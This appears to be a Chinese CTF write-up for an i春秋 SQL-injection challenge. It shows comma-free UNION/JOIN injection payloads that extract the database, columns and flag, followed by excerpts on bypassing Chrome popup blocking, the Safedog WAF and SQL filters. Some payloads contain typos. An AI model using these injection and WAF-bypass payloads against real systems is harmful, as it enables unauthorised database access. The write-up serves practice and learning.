今天做了一道i春秋上面的題,一些東西可以記錄一下。
檢視原始碼按原始碼提示輸入login.php?id=1
burp抓包後也沒什麼有價值的資訊。看了別人的wp發現,需要對第乙個頁面抓包,然後可以找到乙個302重定向。簡單理解就是在我們進入題目的那一刻有乙個頁面跳轉。
真實的url是l0gin.php?id=1.
跟進這個檔案
按套路首先測一下資料庫中被過濾的字元。
發現當輸入id=1' and ascii(substr((select database()),1,1))>64 %23
逗號被waf掉了。
學習了一下無逗號注入
記錄一下
如果不存在逗號的問題,正常的套路應該是
?id=-1' union select 1,2#
?id=-1' union select database(),2#
?id=-1' union select table_name from information.schema.tables where table_schema where table_schema=database() #
join代替逗號:
一,-1' union select * from (select database()) a join (select 2) b %23
資料庫名sqli
二,查資料表
三,-1 ' union select * from (select group_concat(distinct(column_name)) from information_schema.columns where table_schema='sqli' and table_name='users') a join ( select 2 ) b %23
四,-1' union select * from (select group_concat(distinct(flag_9c861b688330)) from users) a join (select 2) b %23
如何繞過chrome的彈窗攔截機制
在chrome的安全機制裡面,非使用者觸發的window.open方法,是會被攔截的。舉個例子 var btn btn btn.click function 上面的 中,window.open是使用者觸發的時候,是不會被攔截的,可以正常開啟新視窗。再看下面這個 var btn btn btn.cli...
安全狗最新版V3 3繞過攔截注入漏洞
最新版安全狗的攔截過濾存在問題,導致可以繞過攔截進行注入 對於select from 的攔截可在 select 前後或中間插入 81 ff,即可繞過攔截注入如 id 1 20union 20sel 81ect 201,2 20from 20admin id 1 20union 20select 81...
mysql 注釋 繞過 sql注入繞過方法
一 注釋符號繞過 在sql中常用的注釋符號有 二 大小寫繞過 當web正則過濾的時候對大小寫不敏感的情況下使用,一般很少會有這種漏洞 比如當過濾了select的時候我們可以採用select來查詢 三 內聯注釋繞過 把要使用的查詢語句放在 中,這樣在一般的資料庫是不會執行的,但是在mysql中內聯注釋...